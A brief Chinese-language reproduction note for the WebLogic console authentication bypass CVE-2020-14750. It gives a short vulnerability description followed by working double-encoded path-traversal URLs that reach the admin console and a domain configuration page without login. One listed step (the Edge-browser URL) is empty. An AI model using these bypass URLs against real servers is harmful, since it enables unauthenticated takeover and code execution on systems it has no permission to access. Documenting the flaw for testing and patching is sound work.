WebLogic权限绕过(CVE-2020-14750)

漏洞描述：

Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。

Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞，该漏洞是CVE-2020-14882 补丁的绕过，远程攻击者可以构造特殊的 HTTP 请求，在未经身份验证的情况下接管 WebLogic Server Console ，从而执行任意代码。

复现过程：

1.访问

?http://ip:port/console/login/LoginForm.jsp

2.Edge浏览器绕过登陆的url

3.访问如下链接，火狐浏览器或者谷歌浏览器可以绕过登录

http://ip:port/console/css/%252e%252e%252fconsole.portal

http://ip:port/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=DomainConfigGeneralPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29?

也可以绕过登录